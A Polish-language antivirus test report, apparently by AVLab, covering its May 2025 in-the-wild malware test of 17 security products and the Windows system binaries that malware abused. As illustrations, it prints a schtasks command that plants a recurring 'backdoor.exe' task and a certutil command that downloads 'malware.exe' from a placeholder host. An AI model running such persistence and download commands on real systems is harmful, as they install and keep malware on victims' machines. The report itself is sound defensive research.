Prawie połowa roku już za nami, tym samym kończymy 3. edycję testu Advanced In-The-Wild Malware Test – długoterminowego badania, którego celem jest wyłonić najlepsze, kompleksowe rozwiązania bezpieczeństwa do ochrony systemów Windows. W maju przetestowaliśmy aż 17 rozwiązań pod kątem wykrywania i neutralizowania zagrożeń – adresy URL prowadzące do szkodliwej zawartości pozyskujemy z różnych miejsc. Są to komercyjne i darmowe feedy, komunikatory, fora internetowe, honeypoty.
Nasze testy są zgodne z wytycznymi Anti-Malware Testing Standards Organisation. Szczegóły na temat badania dostępne są na tej stronie, a także w naszej metodologii.
Jakie rozwiązania testowaliśmy w maju 2025?
Jakich używamy ustawień?
Chociaż w naszych testach staramy się unikać próbek typu PUP i PUA (potencjalnie niepożądanych aplikacji), zalecamy włączenie funkcji ochrony przed tego typu zagrożeniami — sami również zawsze ją aktywujemy.
Podczas konfiguracji oprogramowania zabezpieczającego zwracamy uwagę, aby – jeśli to możliwe – korzystać z dedykowanego rozszerzenia do przeglądarki. Dodatkowo ustawiamy program w taki sposób, by automatycznie reagował na incydenty poprzez ich blokowanie, usuwanie lub naprawianie.
Na podstawie wielu dotychczasowych testów zauważamy, że ustawienia domyślne są zazwyczaj dobre, ale nie zawsze zapewniają optymalny poziom ochrony. Dlatego dla pełnej przejrzystości informujemy o wszystkich modyfikacjach konfiguracji – zarówno tych, które mają na celu zwiększenie skuteczności, jak i tych wymaganych przez producenta oprogramowania.
Rozwiązania klasy Enterprise
Emsisoft Enterprise Security + EDR
Default settings + automatic PUP repair + EDR + Rollback + browser protection
mks_vir Endpoint Security + EDR
Extended http/https scanning enabled + browser protection + EDR
ThreatDown Endpoint Protection + EDR
Default settings + browser protection + EDR
WatchGuard Endpoint Security
Default settings + browser protection
Xcitium ZeroThreat Advanced + EDR
Policy MDR Policy + agent configuration Windows 8.1 Default for all features
Rozwiązania dla konsumentów i małych firm
Avast Free Antivirus
Default settings + automatic PUP repair + browser protection
Bitdefender Total Protection
Default settings + browser protection
Comodo Internet Security 2025
Browser protection + automatic blocking for sandbox
Eset Smart Security
Default settings + browser protection
F-Secure Total
Default settings + browser protection
G Data Internet Security
Default settings + browser protection
Malwarebytes Premium
Default settings + browser protection
McAfee Total Protection
Default settings + browser protection
Microsoft Defender
Default settings (does not integrate with Firefox)
Norton Antivirus Plus
Default settings + browser protection
Webroot Antivirus
Default settings + browser protection
ZoneAlarm Extreme Security NextGen
Default settings + browser protection + Anti-Keylogger enabled
Badanie Advanced In-The-Wild Malware Test
Jak oceniamy i jak długo trwa?
W roku kalendarzowym przeprowadzamy 6 edycji badań, które kończą się wielkim podsumowaniem mającym na celu wyłonić nagrody dla najlepszych rozwiązań antywirusowych.
W każdej edycji oceniamy skuteczność testowanych produktów bezpieczeństwa dla firm i dla konsumentów z uwzględnieniem 3 kluczowych parametrów:
- PRE_EXECUTION – oceniamy, czy zagrożenie zostało zidentyfikowane i zablokowane na wczesnym etapie, zanim jeszcze doszło do jego uruchomienia. Może to obejmować blokadę strony internetowej, pobieranego pliku lub próbę jego zapisu bądź dostępu do niego.
- POST_EXECUTION – sprawdzamy, czy złośliwe oprogramowanie, które zostało pobrane i uruchomione w systemie, zostało rozpoznane i zatrzymane podczas bardziej zaawansowanej analizy. Ten etap symuluje najgroźniejszy scenariusz — atak 0-day, w którym malware zdążyło już rozpocząć działanie.
- REMEDIATION TIME – mierzymy czas, jaki upływa od momentu pojawienia się zagrożenia w systemie do jego całkowitego usunięcia oraz naprawy skutków incydentu. Ten parametr ściśle wiąże się z poprzednimi i pozwala ocenić, jak szybko i skutecznie oprogramowanie radzi sobie z eliminacją zagrożeń.
Złośliwe oprogramowanie często wykorzystuje natywne narzędzia i komponenty systemu Windows (tzw. LOLBins – Living off the Land Binaries) do realizacji nieautoryzowanych operacji bez wzbudzania podejrzeń. Na podstawie przeanalizowanych logów zidentyfikowano następującą liczbę przypadków, w których legalne procesy systemowe zostały zaangażowane w działania malware:
- schtasks.exe, 4974
- rundll32.exe, 3531
- certutil.exe, 2154
- powershell.exe, 1271
- consent.exe, 881
- csc.exe, 455
- wmiprvse.exe, 302
- ping.exe, 263
- reg.exe, 181
- mshta.exe, 145
- wscript.exe, 127
- wmic.exe, 122
- regsvr32.exe, 70
- control.exe, 42
- conhost.exe, 31
- net1.exe, 28
- vssadmin.exe, 26
- iexplore.exe, 8
- cscript.exe, 4
Proces schtasks.exe odnotowano 4974 razy w testowanych systemach, przykładowo:
schtasks /create /tn "Updater" /tr "C:\Users\User\backdoor.exe" /sc minute /mo 5 /f
Proces certutil.exe wystąpił 2154 razy np:
certutil -urlcache -split -f http://example.com/malware.exe malware.exe
Niektóre rozwiązania zabezpieczające nie wykryły przynajmniej jednej próbki zagrożenia. Choć pojedynczy incydent może wydawać się statystycznie nieistotny, to w rzeczywistości może reprezentować nieznane wcześniej zagrożenie typu 0-day. Tego typu atak jest w stanie ominąć mechanizmy ochronne systemu operacyjnego oraz silniki wykrywania zainstalowanego oprogramowania antywirusowego. W konsekwencji może to skutkować infekcją systemu, zaszyfrowaniem danych, kradzieżą informacji lub innym niepożądanym działaniem.
O badaniu z cyklu Advanced In-The-Wild Malware Test
Badanie realizowane jest cyklicznie sześć razy w roku i koncentruje się na ocenie skuteczności rozwiązań ochronnych w wykrywaniu i blokowaniu złośliwego oprogramowania działającego w środowisku systemu Windows 11. Celem badania jest identyfikacja silnych i słabych stron testowanych rozwiązań w zakresie wykrywania i neutralizacji aktywnie występujących w środowisku zagrożeń. Testowi towarzyszy również gromadzenie danych telemetrycznych, które pozwalają na analizę aktualnego krajobrazu zagrożeń oraz technik najczęściej wykorzystywanych przez cyberprzestępców w atakach ukierunkowanych i masowych.
O AVLab Cybersecurity Foundation
AVLab Cybersecurity Foundation to ceniona organizacja działająca w ramach AMTSO (Anti-Malware Testing Standards Organization) oraz Microsoft Virus Initiative (MVI). Specjalizuje się w podnoszeniu poziomu bezpieczeństwa cyfrowego poprzez szczegółowe testy i analizy rozwiązań zabezpieczających. Eksperci AVLab stosują zaawansowane i realistyczne metody oceny skuteczności oprogramowania ochronnego w rzeczywistych warunkach zagrożeń. Organizacja regularnie aktualizuje swoje protokoły testowe, dzięki czemu dostarcza rzetelne i wartościowe raporty z zakresu cyberbezpieczeństwa, wspierając zarówno użytkowników indywidualnych, jak i przedsiębiorstwa w podejmowaniu świadomych decyzji dotyczących ochrony ich systemów.
